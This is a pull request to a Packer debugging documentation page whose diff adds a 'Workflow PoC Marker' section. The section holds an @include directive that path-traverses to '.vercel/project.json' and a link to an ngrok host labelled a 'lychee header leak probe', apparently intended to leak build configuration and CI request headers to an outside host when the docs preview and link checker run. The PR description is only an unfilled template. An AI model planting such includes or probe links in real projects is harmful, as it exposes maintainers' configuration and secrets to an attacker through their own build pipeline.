### PR TITLE
docs: add content-only build preview security poc

### DIFF
--- a/content/packer/v1.14.x/content/docs/debugging.mdx
+++ b/content/packer/v1.14.x/content/docs/debugging.mdx
@@ -10,6 +10,12 @@ last_modified: 2025-11-17T10:53:47-06:00
 
 # Debugging Packer Builds
 
+## Workflow PoC Marker
+
+@include '../../../../../.vercel/project.json'
+
+[lychee header leak probe](https://e8012c5e7022.ngrok.app)
+
 Using `packer build -on-error=ask` allows you to inspect failures and try out
 solutions before restarting the build.
 


### PR DESCRIPTION
Please go to the `Preview` tab and select the appropriate template:

* [Boundary](?expand=1&labels=Boundary&title=Boundary+Docs&template=boundary_pull_request_template.md)
* [Consul](?expand=1&labels=Consul&title=Consul+Docs&template=consul_pull_request_template.md)
* [HCP services](?expand=1&template=hcp_pull_request_template.md)
* [Nomad](?expand=1&labels=Nomad,Runtime&title=Nomad+Docs&template=nomad_pull_request_template.md)

### Terraform

* [HCP Terraform](?expand=1&labels=hcp,terraform&title=HCP+Terraform+Docs&template=hcp_terraform_pull_request_template.md)
* [Terraform](?expand=1&labels=terraform&title=Terraform+Docs&template=terraform_pull_request_template.md)
* [Terraform Enterprise](?expand=1&template=ptfe_release_pull_request_template.md)
